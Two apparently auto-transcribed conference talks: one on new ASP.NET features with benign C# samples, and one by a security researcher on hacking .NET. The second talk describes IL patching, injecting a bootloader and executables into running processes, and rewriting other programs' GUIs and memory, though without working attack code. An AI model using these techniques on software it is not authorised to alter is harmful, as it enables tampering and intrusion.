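For reference, the identity customization shown in this demo comes down to adding plain properties to the user class. A sketch along the lines of the default template's IdentityModels.cs follows; the class and connection-string names match the template conventions but should be treated as assumptions here:

```csharp
using Microsoft.AspNet.Identity.EntityFramework;

// The user is just a POCO that Entity Framework manages, so Nickname and Age
// become columns in the user database and can be evolved later with migrations.
public class ApplicationUser : IdentityUser
{
    public string Nickname { get; set; }
    public int Age { get; set; }
}

// The context the identity system stores users through.
public class ApplicationDbContext : IdentityDbContext<ApplicationUser>
{
    public ApplicationDbContext() : base("DefaultConnection") { }
}
```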
So that, we just talked about identity and, you know, how we've changed the identity system and also how that flows across all the different systems now. It's the same identity system. Scaffolding, we talked about identity. No, that's really kind of more of like an implementation detail of, you know, how the auth is happening. This is more about the identity, how it's stored and what's kind of calling down into OAuth. So that might be OWIN. Okay. So that, we just talked about identity and, you know, how we've changed the identity system and also how that flows across all the different systems now. It's the same identity system. Skaffling, we talked about identity. No, that's really kind of more of like an implementation detail of, you know, how the auth is happening. This is more about the identity, how it's stored and what's kind of calling down into OAuth. So that might open on. Okay. So MVC 5, there's not really, you know, a whole bunch of feature-wise, but remember we just shipped ASP.NET 2012.2 in February and that had tons of new templates and things. The real work that was done on MVC was making it so it's not its own thing. So now there isn't that separate special project type GUID that, you know, has to be associated with your project to get that MVC tooling. Now you can do, you know, it can be added easily into any web application. So you can do an empty web app and then you can easily hook up, you know, MVC controllers. One thing to pay attention to is that this and pretty much everything we're talking about in, you know, in the future here is requiring .NET 4.5. One thing with that is async. There's a huge focus on everything supporting async. So you'll see async, you know, throughout the pipeline. And so that's one reason for that. Web API 2. There are a lot of features. There's a lot of activity going on with Web API partly because it's brand new and partly because there, you know, a lot of people are using it and have real needs for what their service needs to support. And so we're adding them in at a frantic rate. One thing that allows us to do that is that we're able, it's a fully open source project. It's not just open source code, meaning code that's published under an open source license. It's actually an open source project, so we can take contributions from the community. So two things that I'm going to show you are, and, you know, there's a lot of great stuff on this list I'm not going to show you, but OData support, a lot of work around OData. So if you do like OData, you can do a lot around querying. So you can make a very simple controller method or controller action that just exposes your data and exposes it using OData syntax. And so then your clients can go in and say, I would like customers, but I would like to sort them by this and filter by this and I'd like only the top five. And you don't have to write a bunch of controller actions to handle that. So that's OData. Portable HTTP client is, you know, part of this whole effort and the portable HTTP client works all over the place, phone and Windows Store apps and everything. So allowing you to call into your web APIs from other places. But what I'm going to show you is two things, attribute routing and CORS support. So first of all, attribute routing is another way that you can do, that you can configure your routing URLs. So what this allows us to do, I'm really just kind of going to illustrate how they're set up. Okay. So you can still configure routes the way you did, the way you used to. But you can also, that's awesome. All right, well, we'll just look at this code and we'll assume it was going to compile. So this is your own? No. Well, so the question here is this is our own implementation and not the existing plugin. This is attribute routing was first written by Tim McCall and you know, it was a popular NuGet package. So what they did, the two things I'm going to show, CORS support was pretty much just pulled in more as a NuGet package.
And a lot of things we do, we just will say, hey, do you want to contribute this? You know, can we support this as a NuGet package? And everyone says yes, and we just pull it in. That's how DotNetOpenAuth worked. What they did with attribute routing is actually like they worked very closely with Tim McCall, but it was kind of, it was adopted and adapted so it would work really well with Web API and went through all the code review and you know, performance testing and all that stuff. So. Yes. Yeah, yeah. Yeah, so all these attributes here, then you can go in and you can say, yeah. So here's HTTP get and you know, we can bind to things. You can do all kinds of things like here I've got a route prefix. So I don't have to say order/{id}/approve, order/{id} and all that. Everything in this controller is assumed to have order as a prefix. So that's a very simple case. Versioning controllers is another thing where you can go through, let's say we have a customer and they just had an integer ID. And then later we go on and we change our customer so they have a GUID ID. And we need to support both of those, right? So what we're able to do with this is we can get, we can use a route prefix and we can say if somebody calls the API with V1, you know, then we'll go through and we'll do our work using an ID, an ID. If somebody calls with V2, you know, then we'll call in using a GUID. So this is a way to support multiple versions and then our code under the hood is going to, you know, route things to our services. But it makes it a lot easier. Otherwise in the past you'd have to, you know, probably create different controllers or have extra logic in. So this makes this very simple. Two more neat things. One is nested controllers. So let's say we have a movie database, right? And we want people, of course, to be able to browse for movies and get a list of movies. But then let's say we also want people to browse for actors and see all the movies that that actor was in. So normally you'd end up with, you know, probably an actor controller and then it would have a movies action and then that movies action would call into a service that was shared, but it's kind of a lot more work. So instead we can just using attribute routing, we can say, all right, we're just going to say when people call into actors/{id}/movies, we'll just call get movies by actor. So this allows us to have our concerns all in one place. This controller is concerned with movies, right? So we can, you know, keep that all together, but we can support the different consumers. And again here we've got by director. Does that make sense? I know I'm going fast. I've got a lot I want to get through. I have one other here with route constraints. So here we've got, you know, an ID. So we're constraining it to an integer ID. All right. So there's a lot more to this and it's really cool to be able to see, you know, how quickly after they said, well, we're going to accept code contributions, how quickly that has been going. So I want to show one other thing here then which is CORS support. So CORS is cross-origin resource sharing. And what that allows you to do is access one API from another URL. Oops, I just opened the wrong one again. So let's say I've got one web API and I want a different website to be able to call into that from JavaScript. The problem is that browsers will block that because it's a big security hazard.
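Before the CORS walkthrough continues, here is a rough sketch of the attribute routing patterns just described — a prefix, a constraint, and a "nested" route — using hypothetical movie and actor types. Attribute routes are picked up by calling config.MapHttpAttributeRoutes() in WebApiConfig; everything else here is an assumption for illustration.

```csharp
using System.Collections.Generic;
using System.Web.Http;

[RoutePrefix("api/movies")]
public class MoviesController : ApiController
{
    // GET api/movies
    [HttpGet, Route("")]
    public IEnumerable<Movie> GetAll() { return new List<Movie>(); }

    // GET api/movies/5 - {id:int} is a route constraint, so only integer IDs match
    [HttpGet, Route("{id:int}")]
    public Movie GetById(int id) { return new Movie { Id = id }; }

    // GET api/actors/7/movies - the "nested" route; the leading ~/ opts out of the
    // api/movies prefix, but the concern still lives in the movies controller
    [HttpGet, Route("~/api/actors/{actorId:int}/movies")]
    public IEnumerable<Movie> GetByActor(int actorId) { return new List<Movie>(); }
}

public class Movie
{
    public int Id { get; set; }
    public string Title { get; set; }
}
```

The versioning case is the same idea with a version segment in the prefix, for example [RoutePrefix("api/v2/customers")] on the controller that takes GUID IDs.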
If you've got one browser that's able to call into, you know, any arbitrary URL via JavaScript, it could be sending, you know, information in the page. It could be sending passwords or cookies or things like that. So projects and we want CORS. There we go. All right. So I've got a project here. Let me make sure it's the right one. Yeah. Okay. So I've got a project with two web APIs. In one of them, one is going to try and call into the second. Okay. So these are running on port 3000 and 3001. So one of the things that was included in the 2012.2 release was support for help pages. So here if I go into the help page, I've got this test API. All right. This is actually another thing that they made available as a NuGet package that drops right into the help pages. So these help pages are cool because they actually inspect your web API at runtime, look at all your controllers, figure out what the methods return, look at the classes, they generate all this for you. So now I'm going to say, all right, get values. And this succeeds, it's able to call because it's JavaScript in the page calling back to the server that served it up. But now if instead I wanted to call into the same service running on 30001. So localhost. What's that? You can change. Yeah, this will. Yeah, this is really handy. Okay. So now I'm going to call in. So I get an exception. And the reason is because it's blocked by the browser. Browser says that is not allowed. Okay. So let's see. Did I run that with? Okay. So now we've got, we can go in and say enable CORS support. So there's a few things we can do. One is I can say, this is the first is the simplest case. I can say allow any URL to call in and pass any header and use any verb. So that's star, star, star. Okay. Okay. Instead, I'm going to say allow any, you know, allow people to call in from any URL, but I'm only going to accept two headers. They can't pass me any header they want. And I'm only going to accept a get verb. Okay. So that's, this is going in my second web app that is going to allow CORS; it's going to allow cross-origin access from the first browser. Okay. So now I'm going to go, I'm on 3000. See if this works. Okay. So I'm going to go to 3000. Okay. All right. So that's able to make the call now. Right. But let's try and add in some crazy header. So I'm going to add in X-Foo and it's going to ask for some spaghetti. All right. So that's blocked. But now I, if you remember in my code, I had said I will allow the X-NDC header. Right. So I'm going to go in and say this is now X-NDC. And that succeeds. All right. So this is the kind of thing where if you haven't run into this, you're wondering why anyone would care about this. If you have run into this, this is a lifesaver. It's really hard to be able to call in from one server to another server via JavaScript. From one web page, served off one domain to another domain over JavaScript. So this is all set up. And that was done because of another open source library that someone else contributed. All right. So tons of other great stuff in web API. I, you know, can't dig into any more of it, but it is very awesome. SignalR 2.0. One of the big things that there's a talk later today on that from the people that built SignalR. So I have neither the time nor the wisdom to try and match that. But one of the things they've added is again support for, for OWIN working towards that. So I've been talking about OWIN and Katana this whole time. And let's see where we're at.
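For reference, the CORS setup demoed here reduces to a few lines with the Microsoft.AspNet.WebApi.Cors package. A sketch is below; the origin value, the second allowed header and the config class name are assumptions — the talk only pins down the X-NDC header and the GET verb.

```csharp
using System.Web.Http;
using System.Web.Http.Cors;

public static class WebApiConfig
{
    public static void Register(HttpConfiguration config)
    {
        // The allow-everything case would be origins: "*", headers: "*", methods: "*".
        // Here: any origin may call in, but only these headers and only GET.
        var cors = new EnableCorsAttribute(
            origins: "*",
            headers: "accept,x-ndc",
            methods: "GET");
        config.EnableCors(cors);

        config.MapHttpAttributeRoutes();
    }
}
```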
I have like two minutes to show it, which is awesome. Okay. So here's how, this is the problem that OWIN and Katana solve. In the past, you would write some code and it would kind of be hosted inside of ASP.net and it would run on top of IIS. So everything kind of assumed your application, if you wanted to extend it, well, you can write modules and handlers. You can work with ASP.net and that's about all you can do. Which works in a lot of cases, but we don't know about the other cases because we don't even think about them. So what OWIN and Katana did was break everything apart. So each of these layers can talk to each other via a simple delegate. So the host, so for instance, the application can make calls into the middleware. Passing, it passes a dictionary, which includes the application state, and it returns a task. So the way that any OWIN component plugs into another one is it has a function, it receives a dictionary that has application state and returns a task. So the idea is if you want to talk to me, you say, okay, we're a web app. Here's what's going on. Here's the package. It's got, you know, all the headers. It's got the URL. It's got, you know, all the state of the app up till now. You give me back a task. The task is just a promise that when I'm done with my work and everyone else down the chain is done with their work, I'm going to feed that information back up to you. Okay? So it's a whole async chain. The reason that I've got all these lines there on middleware is this is, there's a lot of great features that this enables. One being that it can be really fast, very lightweight compared to ASP.net, traditional ASP.net, which kind of had to support everything that web forms did all the way back to 1.0. But also middleware can be very pluggable. So I can plug in all different kinds of middleware components that can do different things. So let's look at one of those. And that will be my last demo. Okay, so. So what I did is I create, come on now, stop. Shift F5. What I did for this demo is I went File New Project. If you go onto the ASP.net site and search for Katana, K-A-T-A-N-A, there's a whole white paper that tells you all the different things you can do with Katana and how to get started. So I followed one of those. I created a new empty web application. I pulled in two NuGet packages that make it easier to write, you know, OWIN components. So this is my entire website. Thank you. All right. That's because. There we go. Okay. So I have this app builder. You may remember I showed that before in the identity thing. So it receives a, you know, it sets up this delegate here for the async handler. And then it's going to return and notice all the async in there. Everything's wired up async. So this is all I have to do. I say my response is HTML and it's going to write some content to it. All right. But now I want to hook in some middleware. So if I hit F5 on this, you would see, you know, a web page and it would say hello, NDC. Not all that exciting. But this is an entire web app. There's nothing else. There's not all kinds of handlers and all that sort of stuff. This is all that there is. Okay. So now in my little surprises region, I've set up a few middleware things. And also a link to where you can find out some more middleware. So I've created two. One is a logger and the other is a copyrighter. A copyrighter just puts a copyright sign after everything on the page. So I want to protect that stuff. Okay. So let's, yeah, you're right. A copyrighter. Okay.
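Before the middleware, here is roughly what the "entire website" being described looks like, using the Microsoft.Owin helper package pulled in over NuGet. This is a sketch; the greeting text is an assumption.

```csharp
using System.Threading.Tasks;
using Microsoft.Owin;
using Owin;

public class Startup
{
    // Katana calls Configuration and hands over the IAppBuilder used to compose the pipeline.
    public void Configuration(IAppBuilder app)
    {
        app.Run(async context =>
        {
            // "My response is HTML and it's going to write some content to it."
            context.Response.ContentType = "text/html";
            await context.Response.WriteAsync("<h1>Hello, NDC!</h1>");
        });
    }
}
```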
So let's first we've got, this is my logger. So remember I said that the important signature here is this. Don't get too worried. This looks like a lot. But basically this first chunk says give me the application state. And you can dig into that and get stuff out. And I will, this whole thing, and I will return you a task. Okay. So when people call in, this is what they do. So when people call, excuse me, this is the one I should have done. So people call invoke and they, and you return them a task. So this one just says, all right, I'm going to log. And then I'm going to delegate to the next thing in the chain. And then I'm going to log again. Start and end. All right. So that's all there is to this one. Then I'll show you one more. This is my copy, copyrighter. So all this does is when we call invoke, we pass it the state of the application. And, and it returns a task. So this one says, okay, I'm going to delegate all the way down the chain. Everybody else do your thing and write out what you're going to write. But I am going to get the response. And I'm going to call write async on the response. And I'm going to write out the copyright sign. This is HTML encoded. So the idea is, you know, this is very simple, a few lines of code example. But if you think about it, this can be doing a lot of other things. This middleware can be plugging in things like, okay. So that, oh, so there's the copyright sign. And then if we look into here, there's our logging, okay. So the idea of this middleware is something that I think could be really interesting. If you look at other web frameworks, you know, there's Rack, there's, what is it, PSGI. So there's all these different things that in other web frameworks have, people have done all kinds of crazy things with. I'm thinking that people could do, you know, in addition to like plugging in with logging and that sort of things, they could also be doing image optimization at a different, you know, at a different level. They could be doing, you know, response modification, all kinds of things. So this is very early on, but it's bleeding edge. And I want to show you that. So we are four minutes over. So let me just wrap up. All right. There. Okay. So first we talked about that 2012.2 release and what's in the update 2. We talked about all this stuff. You're going to hear a lot more about all of these things at Build just a few weeks from now. So, you know, we talked about the one ASP.net, the new tooling that supports that showed how the new bootstrap templates make it easier to style and theme things. Scaffolding, a new scaffolding system that works across all of them, Web API and MVC and Web Forms, everybody. A new identity system. I didn't talk at all about SignalR2. MVC5, you know, is really the main work in MVC5 is that it plays well with everybody and it's not off in the corner, you know, feeling smug. Web API, I showed you CORS and attribute routing and then also there are a lot of other features like OData. And then finally we looked at Katana at the end. Finally, I just want to say you can play along at home. We make our roadmap public. You actually, if you go to aspnetwebstack.codeplex.com, you can see the check-ins as they happen. Okay. So if we, there we go. So you can see, you know, if people are working hard, you can see what they're working on. So let's see. Okay. So check in Thursday at 2.03 p.m. Did you know about this? You can also pull all this code down via nightly NuGet packages. So that's how I did some of these demos.
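As an aside, the logger and copyrighter middleware described above boil down to doing work before or after delegating to the next component in the chain. A sketch using the inline app.Use overload follows; the log text and the exact write are assumptions, and in the real demo these were separate middleware classes rather than lambdas.

```csharp
using System;
using System.Threading.Tasks;
using Microsoft.Owin;
using Owin;

public class Startup
{
    public void Configuration(IAppBuilder app)
    {
        // Logger: log, delegate down the chain, then log again when everything below is done.
        app.Use(async (context, next) =>
        {
            Console.WriteLine("Begin: " + context.Request.Path);
            await next();
            Console.WriteLine("End:   " + context.Response.StatusCode);
        });

        // Copyrighter: let everything downstream write first, then append a copyright sign.
        app.Use(async (context, next) =>
        {
            await next();
            await context.Response.WriteAsync(" &copy;");
        });

        // The application itself, same as the hello-world sketch earlier.
        app.Run(async context =>
        {
            context.Response.ContentType = "text/html";
            await context.Response.WriteAsync("Hello, NDC!");
        });
    }
}
```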
I mean, some of this I did via, you know, Visual Studio 2013 pre-release, but some of these I did just using nightly NuGet packages. So there's a whole community writing blog post about all this stuff based on just watching the code as it's checked in, pulling the NuGet packages and putting it to work. I'm out of time. Thank you.
|
Find out what's new and next for ASP.NET developers, including SignalR, new features for ASP.NET Web API, new ASP.NET MVC templates for Facebook apps and Single Page Applications, get a look at the latest web tools for Visual Studio, and more.
|
10.5446/51448 (DOI)
|
I'll just talk for a little bit while everyone settles in. I'm a hacker I guess but more so I found some really cool things in code. I started out as a core developer and fell into the world of security. I think the word hacker is most appropriate but in developer circles I would more say other normal terms like ninja or something else but what it really comes down to is there are things you can do in code that aren't possible. There's like three seats up there. Good luck. When I first got into programming I did engineering, I did the standard interior architecture OOP and that was my core. I thought when you wanted to share memory between two processes you did shared memory DLL mapping. I thought when you wanted to access someone else's program you used an API and that was just the world I lived in. I fell into security where that's not necessarily the truth. I would equate it to something like a computer or something like being a firefighter. If there's a locked room somewhere and someone's trapped in it and the room building is on fire you can go into that room. You have specialized tools that can cut through steel doors. You have access to basically the entire world. That's pretty much what I see security being that the truth is you have complete access over everything. I'm going to do two speeches. The first one I'm going to talk about how I got here and explain a little bit of what I do and who I am. The second speech I'm going to just go into code and I'm just going to focus on what I do on a daily basis, the actual lines of code that I use to attack. I'm John McCoy and I work under Digital Body Guard. This is where you can find research, tools, papers. I basically put out everything that I'm showing you for free. I usually hold back some of my stuff for a year or two and so what you're seeing today is mostly stuff that I've held back, well in the second speech you'll be seeing stuff that I held back for a couple of years now. I try and give back to the community as much as possible. I get paid for securing people. I don't get paid for making security tools. That kind of comes out in my background. I started out in C++ just as a core developer. I eventually graduated up to MFC and found it horrendous. I was like, I need to do something else. I'm like, Java, that's cool, people do that. Then I found .NET. After seeing .NET, I just clicked with the language. It was the first time that I had ever just natively picked it up and everything made sense to me. It was still back in beta. It was still back when .NET was coming out, 1.1. It was still for the most part completely unknown. I wanted to know more and more. I eventually found schools that would not teach me .NET because they didn't really have much .NET knowledge, but schools that would allow me to do .NET. I had to settle for a C++ school that would allow me to do .NET. This actually turned out to be one of the best things that I ever did is going to a C++ school and learning .NET. I eventually fell into security. From security, I fell into just pure research. What is in the CLR? What's in that place that we just put on the map, Dragons? That's what led me to doing application security reviews, pen testing, defending companies and software against hackers, doing development and support, specifically in the security arena. After living in security, I'm also here to give a little bit of just security fitness for the average developer. After living in security, what's easy that you can do on a daily basis that will help protect you?
What I love about .NET: there's a VM. It's abstracted. It's this meta language. It's event driven. It's extendable. It's free and open. It makes the previous languages to me look sloppy. Why .NET sucks? If you search for it, especially back when I first started, 1.1 days, going and typing in .NET or .NET code was the most painful thing. Search engines would convert C sharp to C. There were multiple examples in different languages, specifically because when .NET came out, it was mainly just corporate examples. Most people think that .NET is owned by Microsoft. After entering the hacker world, that was one painful hurdle to overcome. It didn't really have much of any hacker tools. It's still a fairly small group of hackers that actually work with .NET or focus to any degree in .NET. Why hack .NET? You can get more code power. You can remold systems. No one can really stop you. I want to show you that everything that I do as a hacker is all simple lines of code. You can blend different technologies like assembly code and COBOL code. With the right skills, break any system. You can open any system — there are no actual locks. In security, all the locks are fictional. I want to just jump on a quick tangent for a little bit. I want to just cover that .NET is a standard like HTML. I prefer the standard that comes from ECMA and not the ISO versions. These standards, the ECMA I can print up and hand to you. We can, like HTML, have a common protocol. It's like an RFC. This is what makes .NET to me important. This one statement. This is a definition of the CLI, the common language infrastructure in which applications written in multiple high-level languages can be executed on different system environments without the need to rewrite those applications to take into consideration the unique characteristics of that environment. That means you can write a program and not care where it's going to be used. That to me is what makes .NET different. Unlike the previous languages, C++ and before, you had to care whether it was going to x86, x64, this platform, that platform. It actually carries across what Java promised of cross-platform implementations. If you want to take .NET, you can take it to basically any platform you want. To follow up on this, Richard Stallman, one of the grandfathers of open source, he came out and said you should not write software to use .NET. Period, no exceptions. He also then followed it up with there's no reason not to write and distribute on free implementations such as Mono. To him, .NET and Mono were worlds apart. This is because .NET itself is Microsoft; Mono is open source. It's just kind of putting .NET in context. When I say .NET, I'm using it completely incorrectly. I mean the CLI, I mean IL, the runtime. This is important to say that .NET isn't owned by Microsoft. Oh, it is owned by Microsoft. I'm using it incorrectly. I mean .NET, the concept, not the implementation that happened to be developed. Also, when I say C# or code, I mean IL; IL and C# are the same to me. I mean inside of the runtime it's the same. And there's a little bit of, I take liberty with words throughout this speech. And that's interesting when I got into hacking. One of the biggest hurdles that I had was that security people and programmer people have the same words, work on the same systems, but have different definitions for them. When we as developers say stream, that means something very specific in the security world. When the security world says root kit, that means something very specific.
And that was one of the major hurdles to get over coming from a programmer to a security world. And I'm still working on that one. And to kind of show what this ended me up in, I started developing different attacks. I started remolding systems. And just to jump into that, this is remolding PowerShell. And so I remapped PowerShell and I only took over the GUI. I, to me, rootkitted it and changed the base logic. And this is a core protected Microsoft implementation DLL to show you that nothing is off limits. Anything that you can touch on your system, you can change on your system. That with the tools and techniques that I'll cover later on, you can reach in and actually change the objects live in memory. You can change the IL on disk. You can change the assembly code in memory for a process. And that's kind of the interesting stuff that I want to note real quick. So when we talk about applications, we talk about intellectual property implementations. We talk about systems that do highly complex things. We talk about security and infrastructure that controls our world around us. And typically in the world, we build security systems to be like the physical world, to implement protection. And typically in the security world, we want to convey that you can't break it, that security will stop you, that it cannot be easily defeated, it can scale up. And in truth, security looks like this. It is a complex maze that is made to be hard to understand that hopefully no one else can solve except for the person with the keys. And the truth is that crypto is merely a random maze that if you solve it correctly, you get in. A password, nothing actually stops you from gaining access to a system. And in the security world, when you're willing to think outside of the box, that's doubly true. And so I developed a lot of tools around this. I developed, so here's, I want to bring what I learned in the security world back to the developer world. And say you have an executable and you lost the source code to it. This is a program that I built in school. I can drag and drop it in here. It's an executable. I can read the source code. And this has been around forever, that you could open up an executable and get back to source. And you could decompile it. I was fascinated by the fact that back in the day, there were C coders that came from assembly code and could come in and change a C program beyond what it was compiled to. So far that you would not be able to keep the code anymore because executable had evolved so far. And that's kind of what I wanted to have myself. And so I worked on this, where this is a branch on true. And this branch on true is in IL, which is the underpinnings of.NET, which relates to this not if. And we can change this branch on true to a branch on false. And it's this ability to go into a previously existing executable that I no longer have source code for and continue to change it, add to it, and treat it as though it was still source code. And to give you kind of a what it was like growing up as a.NET coder in C++. This is a parser that a lot of my peers in C++ wrote. And I wrote a parser for.NET where it goes through and tokenizes the language and turns it into an output of code comes in and object structures come out. And for me, that was the starting point. Trying to keep up with C++ developers that we're working on building base OSs, network stacks, compilers, all of these low-level things, but building them in.NET and finding my own way to develop them. 
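The branch-on-true edit described above — flipping an IL brtrue to brfalse so the "if" inverts — is the kind of thing any IL rewriting library can do. Here is a minimal sketch using Mono.Cecil; Cecil is an assumption (the speaker's own tooling isn't named here), and Target.exe is a placeholder path.

```csharp
using Mono.Cecil;
using Mono.Cecil.Cil;

class PatchBranch
{
    static void Main()
    {
        var assembly = AssemblyDefinition.ReadAssembly("Target.exe");

        foreach (var type in assembly.MainModule.Types)
        foreach (var method in type.Methods)
        {
            if (!method.HasBody) continue;

            foreach (var instruction in method.Body.Instructions)
            {
                // brtrue / brtrue.s is the IL behind an "if"; flipping it to brfalse
                // inverts the check without touching anything else in the method.
                if (instruction.OpCode == OpCodes.Brtrue)
                    instruction.OpCode = OpCodes.Brfalse;
                else if (instruction.OpCode == OpCodes.Brtrue_S)
                    instruction.OpCode = OpCodes.Brfalse_S;
            }
        }

        assembly.Write("Target.patched.exe");
    }
}
```

Because brtrue and brfalse take the same operand, the flip leaves every other instruction and branch offset untouched, which is why the patched executable stays stable.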
And growing up in that school, it was basically, you can do it, but we can't help you. If you hit a wall, then you either find a way around it or you fail. And that was kind of my starting point of developing compiler stacks OSs in.NET. And I developed a number of free tools that allow you to edit on disk and in memory. Because when I attack your program, I basically see it as something that can easily be defeated that poses basically no protection against me. And typically, whether it's a web server or a database saving your money infrastructure, whatever it might be, I usually attack it in a few fundamental ways. If I can get your application to exception out and lock up, then I can basically use it and abuse it in ways that you never thought would be possible. And this allows me to come at your system and blow right past what security you thought you had and attack the security implementation that actually impacts me. And it allows me to bring weird things in. Like I can bring Erlang in. I can bring assembly code in. I can bring tools and weapons from all these other different languages to attack. And security is a old paradigm. As long as computers have existed, some form of security, whether it be physical or digital, has been evolving. And when I talk about using old tools, there's so much written in assembly code to attack that it dwarfs anything in.NET or Java even. That if you can leverage just 1% of that, you'll have more than is on the shelf today in.NET. And the truth of.NET is that you live in a system. This system is a run time. This is what we like to refer to as a framework. And to me, it's no different than DirectX. It's a framework. You are on top of it. You're outside of it. You can use it. And some of the rules of the framework can be bent and others can be straight broken. And this framework is not enclosing you. There's no necessary barriers actually keeping you inside of the framework. And this basically comes out. And you have a variable. And you don't think anyone else can write to that variable. Why? What makes you think that your memory is actually separate from another process is memory. That there's OS protection. There's nothing in the OS that actually stops me from writing to it unless it's at a different privilege level. If your user and I'm user, we can talk to each other. And I can access write, remold your variables at will. And that's where programs came in for attacking in memory. And it's actually the part that I enjoy much more. So if we take something, let's see. Let's see. We'll find something to attack. So here's an executable that I wrote a long time ago. I want to go on a quick tangent that I wrote this for people that have scotopic sensitivity. So if they say that this green color works better for them or this color works better for them, it will help them. And this has actually been one of my best developer tools that I ever made. This tool has allowed me to code late into the night. That being able to come in and set my screen brightness, the actual light as low as possible and then go into Windows and turn it to as dark as possible. Buys me a couple of extra hours at night of being able to code. And when your eyes are like, oh, you turn it down, you'll have a couple of extra hours. And so let's look at this. IA, I can remold it since I can edit it on disk. And this program targets an executable. It identifies the process ID and injects a bootloader into it. And this bootloader takes other executables. 
And this is kind of where, I guess I would say for a developer, this is where the rubber meets the road of things that you can't do before that are so easy, stable, and deployably ready. I can take other executables and load them in. So I'm taking multiple executables and loading them all into the exact same memory space. And this is important because no longer is there a separation between these GUIs and sharing variables. There's other ways to share variables and access variables. But at this point, these are all in the exact same memory space. To the computer, these are the same. And malware is, I would classify it to me, as self-aware, as able to impact its own existence or existence inside of something else. So this payload comes through and adds a button to any existing GUI. And these buttons themselves are aware and able to access the GUI that they're on. And so this button goes through and changes all of the strings. And this is the ability to say I said, okay, at runtime, I want you to connect into SQL Server Management Studio, and I want you to convert it to finish. You can now do that. That's completely doable. You maintain stability. You are working at a high level. You're working with actual.NET objects. And you can just go through and change it to finish. And these are things that would be incredibly hard. And this is 10, 20 lines of code to carry this out. And this one, ripping it off, serializes a button on one form and deserializes it back into a button on another form. And so you would be able to take, say, SQL Server Management Studio again and your third-party plug-in and put the third-party plug-in anywhere on any form in any way in SQL Server Management Studio and integrate not caring about an API, not caring about anything else, that this one over here, which is some other random executable, now still works. I serialize the button, took the events off, took the events all the way down, put it on another form, put the data for the button back up, and took the events and relinked them. And that's easy. That's 10 lines of code. And it's stable. I'm maintaining that link between that GUI object. And of course, from the... It's also fun because you can make anything run away, so you can't click on any GUI objects anymore. And this is three lines of code. It's on hover over, move away, right? And this is a lot of power for just a few lines of code. And all of this stuff that I'm setting is all in.NET and all quite easy to use. And it's all stable. I'm able to spin up multiple executables, GUIs, intermesh their objects, everything about them, and turn them essentially into one cohesive application and keep it stable. And this is what security has brought up. And that's why hacker power-ups, I'm not exactly sure for the term to be used because it's not that you can suddenly break into any system. I would equate it more to being able to work out. That you work out for hundreds of hours and you gain a lot of power, but that doesn't mean that you're going to mug people. It just means that you have that power. And suddenly you don't need to go and ask for something. You don't need to ask for database credentials. That you understand that the SSL implementation between server A and B is completely broken and you don't need to go ask for an SSL cert anymore. You can just force a cert. 
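A rough sketch of the many-executables-in-one-memory-space idea described above: load another WinForms executable into the current process, run its entry point on a second thread, then walk its open forms and rewrite control text from the outside. The file name is hypothetical and the timing is deliberately crude; the point is only that, once loaded, the other program's GUI objects are ordinary .NET objects.

```csharp
// Hypothetical victim: OtherApp.exe, a WinForms program we did not write.
using System;
using System.Reflection;
using System.Threading;
using System.Windows.Forms;

class Injector
{
    static void Main()
    {
        // Load the other executable as if it were just one of our own DLLs.
        Assembly target = Assembly.LoadFrom("OtherApp.exe");

        // Run its Main on a second thread so its GUI lives inside our process.
        object[] args = target.EntryPoint.GetParameters().Length == 0
            ? null
            : new object[] { new string[0] };
        Thread ui = new Thread(() => target.EntryPoint.Invoke(null, args));
        ui.SetApartmentState(ApartmentState.STA);
        ui.Start();

        Thread.Sleep(2000);   // crude: give the form time to appear

        // Same process, same CLR: its forms are ordinary objects we can reach into.
        foreach (Form form in Application.OpenForms)
        {
            foreach (Control control in form.Controls)
            {
                Control c = control;
                c.Invoke((Action)(() => c.Text = "Hei fra utsiden"));
            }
        }

        Console.ReadLine();   // keep our thread alive while the injected GUI runs
    }
}
```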
And this is what I'm trying to bring back to the community, that you have all of this extra power that allows you to do completely bizarre and before I started doing it, I would have thought impossible things. And when it came down to it, most of the things that I did and wanted to do turned out to be three or four or ten lines of code. That running assembly code in.NET was five to ten lines of code. That integrating with other people's platforms and using someone else's executables and API was easy. And that's where tools like this came in. I wanted to take what I did and bring them back to you and an easy to use. You don't actually have to understand how they work. You can just boot it up and that this function is private. A class might be private. And this is what APIs give us. And when you're able to access and manipulate code, you can say I want to take this from private and I want to make it public. And you can now take someone else's executable or DLL and just it's public. You don't need to ask for an API anymore. You can use their DLL as if it was your own, as if you actually created it. And that's kind of what I want to show that this isn't just about hacking. This is about taking a Java jar that the programmers all left ten years ago porting that into.NET and accessing. And it's about taking some other random application like SQL Server Management Studio and being able to put it in Swedish or Norwegian or Finnish in just a couple of minutes. And then being able to go through and show that it produces essentially the same output as a normal DLL or executable. You're not giving up stability or production quality to do so. And the same thing with injecting in memory. That when you're injecting into other processes that you can say instead of an API into that application, I'm going to crawl into memory. And I'm using normal Windows calls. I'm using normal application to application communication. And so there's a part of me that almost doesn't like the word hacker. I mean, it's appropriate in the security community, but in the developer community, I would equate it more to really working out or being bitten by a radioactive code bug that suddenly you can go through and convert a Java jar to.NET. You can convert Delphi to.NET. Deprecated now Pascal to.NET. Cobalt and VB6. And that when you come up to a project and you want to work with a Java developer, you can now work in the same platform. That's kind of the beauty that was unstated for me about.NET. It was developing a, you can write and deploy on any platform. But it's also intermediate where you can take a Java intermediate language, map that to.NET and deploy it on a Wii, an Xbox, that you can take.NET and turn it into 64-bit code, X86 code. You can try and put it back in the JVM. That's a little sketchy. You can export it to Cocoa and Objective-C code. You can port it straight to an ARM. And this is an ARM device. This is the one I prefer, tiny CLR. And it is an ARM processor with a stack that's built entirely from.NET. And so for a couple of projects, I needed to write attacking hardware. And it was like, well, I don't want to learn some low-level stuff. I want to use high-level objects. I want to use arrays. I want to use.NET. And it does. It just ports out into ARM. And it's a great way to think that for basically any platform that you want, that.NET can try and bring you future and past compatibility. That it can also, in runtime, combine multiple things. That you can combine.NET with assembly code. 
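A small sketch of the "you don't need to ask for an API anymore" point: plain reflection reaching a non-public type and method inside somebody else's DLL. The assembly, type and method names here are made up for illustration.

```csharp
// Hypothetical names throughout: ThirdParty.dll, ThirdParty.Internal.Worker, DoWork.
using System;
using System.Reflection;

class PrivateCaller
{
    static void Main()
    {
        Assembly lib = Assembly.LoadFrom("ThirdParty.dll");
        Type worker = lib.GetType("ThirdParty.Internal.Worker");

        // Instantiate the type even though neither it nor its constructor is public.
        object instance = Activator.CreateInstance(worker, nonPublic: true);

        // Grab the private instance method and call it as if it were our own API.
        MethodInfo doWork = worker.GetMethod("DoWork",
            BindingFlags.Instance | BindingFlags.NonPublic);

        object result = doWork.Invoke(instance, new object[] { 42 });
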